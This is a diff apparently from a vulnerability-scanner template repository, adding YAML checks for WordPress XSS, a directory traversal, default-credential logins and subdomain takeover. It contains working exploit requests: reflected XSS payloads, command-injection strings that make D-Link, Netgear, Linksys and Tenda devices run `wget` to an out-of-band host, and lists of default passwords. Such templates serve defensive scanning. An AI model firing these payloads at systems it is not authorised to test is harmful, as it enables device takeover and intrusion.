reference: https://nvd.nist.gov/vuln/detail/CVE-2018-5316
|
||||||
|
tags: cve,cve2018,wordpress,xss,wp-plugin
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- '{{BaseURL}}/wp-content/plugins/sagepay-server-gateway-for-woocommerce/includes/pages/redirect.php?page=%3C%2Fscript%3E%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "<script>alert(123)</script>"
|
||||||
|
part: body
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: header
|
||||||
|
words:
|
||||||
|
- text/html
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,29 @@
|
||||||
|
id: CVE-2019-12616
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: phpMyAdmin CSRF
|
||||||
|
author: Mohammedsaneem
|
||||||
|
description: A vulnerability was found that allows an attacker to trigger a CSRF attack against a phpMyAdmin user. The attacker can trick the user, for instance through a broken <img> tag pointing at the victim's phpMyAdmin database, and the attacker can potentially deliver a payload (such as a specific INSERT or DELETE statement) through the victim.
|
||||||
|
severity: medium
|
||||||
|
tags: cve,cve2019,phpmyadmin,csrf
|
||||||
|
reference: |
|
||||||
|
- https://www.phpmyadmin.net/security/PMASA-2019-4/
|
||||||
|
- https://www.exploit-db.com/exploits/46982
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2019-12616
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/phpmyadmin/"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "4.6.6deb4+deb9u2"
|
||||||
|
- "phpMyAdmin"
|
||||||
|
condition: and
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,32 @@
|
||||||
|
id: CVE-2019-15713
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: My Calendar <= 3.1.9 - Reflected Cross-Site Scripting (XSS)
|
||||||
|
author: daffainfo
|
||||||
|
severity: medium
|
||||||
|
description: Triggered via unescaped usage of URL parameters in multiple locations presented in the public view of a site.
|
||||||
|
reference: |
|
||||||
|
- https://wpscan.com/vulnerability/9267
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2019-15713
|
||||||
|
tags: cve,cve2019,wordpress,xss,wp-plugin
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- '{{BaseURL}}/?rsd=%27%3E%3Csvg%2Fonload%3Dconfirm%28123%29%3E'
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "<svg/onload=confirm(123)>"
|
||||||
|
part: body
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: header
|
||||||
|
words:
|
||||||
|
- text/html
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,30 @@
|
||||||
|
id: CVE-2019-16332
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: API Bearer Auth <= 20181229 - Reflected Cross-Site Scripting (XSS)
|
||||||
|
author: daffainfo
|
||||||
|
severity: medium
|
||||||
|
description: In the api-bearer-auth plugin before 20190907 for WordPress, the server parameter is not correctly filtered in the swagger-config.yaml.php file, and it is possible to inject JavaScript code, aka XSS.
|
||||||
|
reference: https://nvd.nist.gov/vuln/detail/CVE-2019-16332
|
||||||
|
tags: cve,cve2019,wordpress,xss,wp-plugin
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- '{{BaseURL}}/wp-content/plugins/api-bearer-auth/swagger/swagger-config.yaml.php?&server=%3Cscript%3Ealert%28123%29%3C/script%3E'
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "<script>alert(123)</script>"
|
||||||
|
part: body
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: header
|
||||||
|
words:
|
||||||
|
- text/html
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,30 @@
|
||||||
|
id: CVE-2019-16525
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Wordpress Plugin Checklist <= 1.1.5 - Reflected Cross-Site Scripting (XSS)
|
||||||
|
author: daffainfo
|
||||||
|
severity: medium
|
||||||
|
description: An XSS issue was discovered in the checklist plugin before 1.1.9 for WordPress. The fill parameter is not correctly filtered in the checklist-icon.php file, and it is possible to inject JavaScript code.
|
||||||
|
reference: https://nvd.nist.gov/vuln/detail/CVE-2019-16525
|
||||||
|
tags: cve,cve2019,wordpress,xss,wp-plugin
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- '{{BaseURL}}/wp-content/plugins/checklist/images/checklist-icon.php?&fill=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E%3C%2Fpath%3E'
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "<script>alert(123)</script>"
|
||||||
|
part: body
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: header
|
||||||
|
words:
|
||||||
|
- text/html
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,26 @@
|
||||||
|
id: CVE-2019-20085
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: TVT NVMS 1000 - Directory Traversal
|
||||||
|
author: daffainfo
|
||||||
|
severity: high
|
||||||
|
description: TVT NVMS-1000 devices allow GET /.. Directory Traversal
|
||||||
|
reference: |
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2019-20085
|
||||||
|
- https://www.exploit-db.com/exploits/48311
|
||||||
|
tags: cve,cve2019,iot,lfi
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/../../../../../../../../../../../Windows/win.ini"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "\\[(font|extension|file)s\\]"
|
||||||
|
part: body
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -18,7 +18,9 @@ requests:
|
||||||
- type: word
|
- type: word
|
||||||
words:
|
words:
|
||||||
- "<img src=x onerror=alert(123);>"
|
- "<img src=x onerror=alert(123);>"
|
||||||
|
- "catch-breadcrumb"
|
||||||
part: body
|
part: body
|
||||||
|
condition: and
|
||||||
|
|
||||||
- type: word
|
- type: word
|
||||||
part: header
|
part: header
|
||||||
|
|
|
@ -20,6 +20,11 @@ requests:
|
||||||
- "<img src onerror=alert(123)>"
|
- "<img src onerror=alert(123)>"
|
||||||
part: body
|
part: body
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "nova-lite"
|
||||||
|
part: body
|
||||||
|
|
||||||
- type: word
|
- type: word
|
||||||
part: header
|
part: header
|
||||||
words:
|
words:
|
||||||
|
|
|
@ -0,0 +1,35 @@
|
||||||
|
id: CVE-2020-25506
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: D-Link DNS-320 - Unauthenticated Remote Code Execution
|
||||||
|
author: gy741
|
||||||
|
severity: critical
|
||||||
|
description: The exploit targets a command injection vulnerability in a system_mgr.cgi component. The component does not successfully sanitize the value of the HTTP parameters f_ntp_server, which in turn leads to arbitrary command execution.
|
||||||
|
reference: |
|
||||||
|
- https://gist.github.com/WinMin/6f63fd1ae95977e0e2d49bd4b5f00675
|
||||||
|
- https://unit42.paloaltonetworks.com/mirai-variant-iot-vulnerabilities/
|
||||||
|
tags: cve,cve2020,dlink,rce,oob
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
POST /cgi-bin/system_mgr.cgi? HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
|
||||||
|
Accept: */*
|
||||||
|
Connection: close
|
||||||
|
|
||||||
|
C1=ON&cmd=cgi_ntp_time&f_ntp_server=`wget http://{{interactsh-url}}`
|
||||||
|
|
||||||
|
- |
|
||||||
|
POST /cgi-bin/system_mgr.cgi?C1=ON&cmd=cgi_ntp_time&f_ntp_server=`wget http://{{interactsh-url}}` HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
|
||||||
|
Accept: */*
|
||||||
|
Connection: close
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: interactsh_protocol # Confirms the HTTP Interaction
|
||||||
|
words:
|
||||||
|
- "http"
|
|
@ -0,0 +1,28 @@
|
||||||
|
id: CVE-2020-26919
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Netgear ProSAFE Plus - Unauthenticated Remote Code Execution
|
||||||
|
author: gy741
|
||||||
|
severity: critical
|
||||||
|
description: It was found that every section of the web could be used as a valid endpoint to submit POST requests being the action defined by the submitId argument. The problem was located in the login.html webpage, that has to be publicly available to perform login requests but does not implement any restriction for executing debug actions. This will allow users execute system commands.
|
||||||
|
reference: |
|
||||||
|
- https://research.nccgroup.com/2021/03/08/technical-advisory-multiple-vulnerabilities-in-netgear-prosafe-plus-jgs516pe-gs116ev2-switches/
|
||||||
|
- https://unit42.paloaltonetworks.com/mirai-variant-iot-vulnerabilities/
|
||||||
|
tags: cve,cve2020,netgear,rce,oob
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
POST /login.htm HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
|
||||||
|
Accept: */*
|
||||||
|
Connection: close
|
||||||
|
|
||||||
|
submitId=debug&debugCmd=wget+http://{{interactsh-url}}&submitEnd=
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: interactsh_protocol # Confirms the HTTP Interaction
|
||||||
|
words:
|
||||||
|
- "http"
|
|
@ -0,0 +1,29 @@
|
||||||
|
id: CVE-2020-35713
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Linksys RE6500 Pre-Auth RCE
|
||||||
|
author: gy741
|
||||||
|
severity: critical
|
||||||
|
reference: https://resolverblog.blogspot.com/2020/07/linksys-re6500-unauthenticated-rce-full.html
|
||||||
|
description: Belkin LINKSYS RE6500 devices before 1.0.012.001 allow remote attackers to execute arbitrary commands or set a new password via shell metacharacters to the goform/setSysAdm page.
|
||||||
|
tags: cve,cve2020,linksys,rce,oob,router
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
POST /goform/setSysAdm HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
|
||||||
|
Accept-Encoding: gzip, deflate
|
||||||
|
Accept: */*
|
||||||
|
Connection: keep-alive
|
||||||
|
Origin: http://{{Hostname}}
|
||||||
|
Referer: http://{{Hostname}}/login.shtml
|
||||||
|
|
||||||
|
admuser=admin&admpass=;wget http://{{interactsh-url}};&admpasshint=61646D696E=&AuthTimeout=600&wirelessMgmt_http=1
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: interactsh_protocol # Confirms the HTTP Interaction
|
||||||
|
words:
|
||||||
|
- "http"
|
|
@ -0,0 +1,32 @@
|
||||||
|
id: CVE-2021-31755
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Tenda Router AC11 RCE
|
||||||
|
description: Vulnerabilities in the web-based management interface of enda Router AC11 could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device.
|
||||||
|
author: gy741
|
||||||
|
severity: critical
|
||||||
|
reference: |
|
||||||
|
- https://github.com/Yu3H0/IoT_CVE/tree/main/Tenda/CVE_3
|
||||||
|
- https://www.fortinet.com/blog/threat-research/the-ghosts-of-mirai
|
||||||
|
tags: cve,cve2021,tenda,rce,oob
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
POST /goform/setmac HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Connection: close
|
||||||
|
Accept-Encoding: gzip, deflate
|
||||||
|
Accept: */*
|
||||||
|
Origin: http://{{Hostname}}
|
||||||
|
Referer: http://{{Hostname}}/index.htmlr
|
||||||
|
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
|
module1=wifiBasicCfg&doubleBandUnityEnable=false&wifiTotalEn=true&wifiEn=true&wifiSSID=Tenda_B0E040&mac=wget+http://{{interactsh-url}}&wifiSecurityMode=WPAWPA2%2FAES&wifiPwd=Password12345&wifiHideSSID=false&wifiEn_5G=true&wifiSSID_5G=Tenda_B0E040_5G&wifiSecurityMode_5G=WPAWPA2%2FAES&wifiPwd_5G=Password12345&wifiHideSSID_5G=false&module2=wifiGuest&guestEn=false&guestEn_5G=false&guestSSID=Tenda_VIP&guestSSID_5G=Tenda_VIP_5G&guestPwd=&guestPwd_5G=&guestValidTime=8&guestShareSpeed=0&module3=wifiPower&wifiPower=high&wifiPower_5G=high&module5=wifiAdvCfg&wifiMode=bgn&wifiChannel=auto&wifiBandwidth=auto&wifiMode_5G=ac&wifiChannel_5G=auto&wifiBandwidth_5G=auto&wifiAntijamEn=false&module6=wifiBeamforming&wifiBeaformingEn=true&module7=wifiWPS&wpsEn=true&wanType=static
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: interactsh_protocol # Confirms the HTTP Interaction
|
||||||
|
words:
|
||||||
|
- "http"
|
|
@ -0,0 +1,67 @@
|
||||||
|
id: adobe-aem-default-credentials
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Adobe AEM Default Credentials
|
||||||
|
author: random-robbie
|
||||||
|
severity: critical
|
||||||
|
tags: aem,default-login
|
||||||
|
reference:
|
||||||
|
|
||||||
|
requests:
|
||||||
|
|
||||||
|
- payloads:
|
||||||
|
|
||||||
|
rr_username:
|
||||||
|
- admin
|
||||||
|
- grios
|
||||||
|
- replication-receiver
|
||||||
|
- vgnadmin
|
||||||
|
- aparker@geometrixx.info
|
||||||
|
- jdoe@geometrixx.info
|
||||||
|
- james.devore@spambob.com
|
||||||
|
- matt.monroe@mailinator.com
|
||||||
|
- aaron.mcdonald@mailinator.com
|
||||||
|
- jason.werner@dodgit.com
|
||||||
|
|
||||||
|
rr_password:
|
||||||
|
- admin
|
||||||
|
- password
|
||||||
|
- replication-receiver
|
||||||
|
- vgnadmin
|
||||||
|
- aparker
|
||||||
|
- jdoe
|
||||||
|
- password
|
||||||
|
- password
|
||||||
|
- password
|
||||||
|
- password
|
||||||
|
|
||||||
|
attack: pitchfork # Available options: sniper, pitchfork and clusterbomb
|
||||||
|
|
||||||
|
raw:
|
||||||
|
- |
|
||||||
|
POST /libs/granite/core/content/login.html/j_security_check HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:89.0) Gecko/20100101 Firefox/89.0
|
||||||
|
Accept: text/plain, */*; q=0.01
|
||||||
|
Accept-Language: en-US,en;q=0.5
|
||||||
|
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
||||||
|
X-Requested-With: XMLHttpRequest
|
||||||
|
Content-Length: 67
|
||||||
|
Origin: {{BaseURL}}
|
||||||
|
Referer: {{BaseURL}}/libs/granite/core/content/login.html
|
||||||
|
Connection: close
|
||||||
|
|
||||||
|
_charset_=utf-8&j_username={{rr_username}}&j_password={{rr_password}}&j_validate=true
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: header
|
||||||
|
words:
|
||||||
|
- login-token
|
||||||
|
- crx.default
|
||||||
|
condition: and
|
|
@ -0,0 +1,31 @@
|
||||||
|
id: dell-emc-ecom-default-credentials
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Dell EMC ECOM Default Credentials
|
||||||
|
author: Techryptic (@Tech)
|
||||||
|
severity: high
|
||||||
|
description: Default Credentials of admin:#1Password on Dell EMC ECOM application.
|
||||||
|
reference: https://www.dell.com/support/kbdoc/en-za/000171270/vipr-controller-operation-denied-by-clariion-array-you-are-not-privileged-to-perform-the-requested-operation
|
||||||
|
tags: dell,emc,ecom,default-login
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- '{{BaseURL}}'
|
||||||
|
headers:
|
||||||
|
Authorization: Basic YWRtaW46IzFQYXNzd29yZA==
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "Set-Cookie: ECOMSecurity"
|
||||||
|
part: header
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "Welcome to ECOM"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,31 @@
|
||||||
|
id: hortonworks-smartsense-default-credentials
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: HortonWorks SmartSense Default Credentials
|
||||||
|
author: Techryptic (@Tech)
|
||||||
|
severity: high
|
||||||
|
description: Default Credentials of admin:admin on HortonWorks SmartSense application.
|
||||||
|
reference: https://docs.cloudera.com/HDPDocuments/SS1/SmartSense-1.2.2/bk_smartsense_admin/content/manual_server_login.html
|
||||||
|
tags: hortonworks,smartsense,default-login
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- '{{BaseURL}}/apt/v1/context'
|
||||||
|
headers:
|
||||||
|
Authorization: Basic YWRtaW46YWRtaW4=
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "Set-Cookie: SUPPORTSESSIONID"
|
||||||
|
part: header
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "smartsenseId"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,34 @@
|
||||||
|
id: idemia-biometrics-default-credentials
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: IDEMIA BIOMetrics Default Credentials
|
||||||
|
author: Techryptic (@Tech)
|
||||||
|
severity: high
|
||||||
|
description: Default Credentials of password=12345 on IDEMIA BIOMetrics application.
|
||||||
|
reference: https://www.google.com/search?q=idemia+password%3D+"12345"
|
||||||
|
tags: idemia,biometrics,default-login
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: POST
|
||||||
|
path:
|
||||||
|
- '{{BaseURL}}/cgi-bin/login.cgi'
|
||||||
|
|
||||||
|
body: password=12345
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "session_id="
|
||||||
|
- "resource"
|
||||||
|
condition: and
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "Invalid Password"
|
||||||
|
part: body
|
||||||
|
negative: true
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,31 @@
|
||||||
|
id: panos-default-credentials
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Palo Alto Networks PAN-OS Default Credentials
|
||||||
|
author: Techryptic (@Tech)
|
||||||
|
severity: high
|
||||||
|
description: Default Credentials of admin:admin on Palo Alto Networks PAN-OS application.
|
||||||
|
reference: https://docs.paloaltonetworks.com/pan-os/8-1/pan-os-admin/getting-started/integrate-the-firewall-into-your-management-network/perform-initial-configuration.html#:~:text=By%20default%2C%20the%20firewall%20has,with%20other%20firewall%20configuration%20tasks.
|
||||||
|
tags: paloalto,panos,default-login
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: POST
|
||||||
|
path:
|
||||||
|
- '{{BaseURL}}/php/login.php'
|
||||||
|
|
||||||
|
body: user=admin&passwd=admin&challengePwd=&ok=Login
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "Set-Cookie: PHPSESSID"
|
||||||
|
part: header
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "Warning: Your device is still configured with the default admin"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,28 @@
|
||||||
|
id: ricoh-weak-password
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Ricoh Weak Password
|
||||||
|
author: gy741
|
||||||
|
severity: high
|
||||||
|
tags: ricoh,default-login
|
||||||
|
reference: https://ricoh-printer.co/default-username-and-password-for-ricoh-web-image-monitor/
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
POST /web/guest/tw/websys/webArch/login.cgi HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Cookie: cookieOnOffChecker=on;
|
||||||
|
|
||||||
|
wimToken=&userid_work=&userid=YWRtaW4%3D&password_work=&password=&open=
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- 'wimsesid=[0-9]+'
|
||||||
|
part: header
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 302
|
|
@ -0,0 +1,27 @@
|
||||||
|
id: visionhub-default-credentials
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: VisionHub Default Credentials
|
||||||
|
author: Techryptic (@Tech)
|
||||||
|
severity: high
|
||||||
|
description: Default Credentials of admin:admin on VisionHub application.
|
||||||
|
tags: visionhub,default-login
|
||||||
|
reference: https://www.qognify.com/products/visionhub/
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: POST
|
||||||
|
path:
|
||||||
|
- '{{BaseURL}}/VisionHubWebApi/api/Login'
|
||||||
|
headers:
|
||||||
|
Authorization: Basic YWRtaW46YWRtaW4=
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "Set-Cookie: admin"
|
||||||
|
part: header
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -2,7 +2,7 @@ id: heroku-takeover
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: heroku takeover detection
|
name: heroku takeover detection
|
||||||
author: pdteam
|
author: 0xPrial,pdteam
|
||||||
severity: high
|
severity: high
|
||||||
tags: takeover
|
tags: takeover
|
||||||
reference: https://github.com/EdOverflow/can-i-take-over-xyz
|
reference: https://github.com/EdOverflow/can-i-take-over-xyz
|
||||||
|
@ -15,7 +15,6 @@ requests:
|
||||||
matchers:
|
matchers:
|
||||||
- type: word
|
- type: word
|
||||||
words:
|
words:
|
||||||
- "There's nothing here, yet."
|
|
||||||
- "herokucdn.com/error-pages/no-such-app.html"
|
- "herokucdn.com/error-pages/no-such-app.html"
|
||||||
- "<title>No such app</title>"
|
- "<title>No such app</title>"
|
||||||
condition: and
|
condition: and
|
|
@ -2,7 +2,7 @@ id: netlify-takeover
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: netlify takeover detection
|
name: netlify takeover detection
|
||||||
author: pdteam
|
author: 0xPrial,pdteam
|
||||||
severity: high
|
severity: high
|
||||||
tags: takeover
|
tags: takeover
|
||||||
reference: https://github.com/EdOverflow/can-i-take-over-xyz
|
reference: https://github.com/EdOverflow/can-i-take-over-xyz
|
||||||
|
@ -16,9 +16,9 @@ requests:
|
||||||
matchers:
|
matchers:
|
||||||
- type: word
|
- type: word
|
||||||
words:
|
words:
|
||||||
- "Not Found"
|
- "Not found - Request ID:"
|
||||||
|
|
||||||
- type: word
|
- type: word
|
||||||
words:
|
words:
|
||||||
- "server: Netlify"
|
- "Netlify"
|
||||||
part: header
|
part: header
|
|
@ -0,0 +1,26 @@
|
||||||
|
id: aem-detection
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Favicon based AEM Detection
|
||||||
|
severity: info
|
||||||
|
author: shifacyclewala,hackergautam
|
||||||
|
tags: aem,favicon,tech
|
||||||
|
reference: |
|
||||||
|
- https://twitter.com/brsn76945860/status/1171233054951501824
|
||||||
|
- https://gist.github.com/yehgdotnet/b9dfc618108d2f05845c4d8e28c5fc6a
|
||||||
|
- https://medium.com/@Asm0d3us/weaponizing-favicon-ico-for-bugbounties-osint-and-what-not-ace3c214e139
|
||||||
|
- https://github.com/devanshbatham/FavFreak
|
||||||
|
- https://github.com/sansatart/scrapts/blob/master/shodan-favicon-hashes.csv
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/libs/granite/core/content/login/favicon.ico"
|
||||||
|
|
||||||
|
redirects: true
|
||||||
|
max-redirects: 2
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- "status_code==200 && (\"-144483185\" == mmh3(base64_py(body)))"
|
|
@ -0,0 +1,24 @@
|
||||||
|
id: node-red-detect
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Node RED Detect
|
||||||
|
author: pikpikcu
|
||||||
|
severity: info
|
||||||
|
tags: tech,apache
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- "<title>Node-RED</title>"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,39 @@
|
||||||
|
id: sap-igs-detect
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: SAP Internet Graphics Server (IGS) Detection
|
||||||
|
author: _generic_human_
|
||||||
|
description: Detection of SAP Internet Graphics Server (IGS)
|
||||||
|
severity: info
|
||||||
|
tags: sap,tech,igs
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}"
|
||||||
|
|
||||||
|
redirects: true
|
||||||
|
max-redirects: 2
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- "SAP IGS"
|
||||||
|
- "is running"
|
||||||
|
condition: and
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: header
|
||||||
|
words:
|
||||||
|
- "SAP Internet Graphics Server"
|
||||||
|
|
||||||
|
extractors:
|
||||||
|
- type: kval
|
||||||
|
part: header
|
||||||
|
kval:
|
||||||
|
- "Server"
|
|
@ -0,0 +1,21 @@
|
||||||
|
id: seeddms-detect
|
||||||
|
info:
|
||||||
|
name: Seeddms-
|
||||||
|
author: pussycat0x
|
||||||
|
severity: info
|
||||||
|
tags: tech
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/out/out.Login.php?referuri=%2Fout%2Fout.ViewFolder.php"
|
||||||
|
|
||||||
|
redirects: true
|
||||||
|
max-redirects: 2
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "<title>SeedDMS: Sign in</title>"
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,25 @@
|
||||||
|
id: yapi-detect
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: YApi Detect
|
||||||
|
author: pikpikcu
|
||||||
|
severity: info
|
||||||
|
tags: tech,yapi
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/"
|
||||||
|
- "{{BaseURL}}:3000"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- "<title>YApi-高效、易用、功能强大的可视化接口管理平台</title>"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,35 @@
|
||||||
|
id: optilink-ont1gew-gpon-rce
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: OptiLink ONT1GEW GPON - Pre-Auth Remote Code Execution
|
||||||
|
author: gy741
|
||||||
|
severity: critical
|
||||||
|
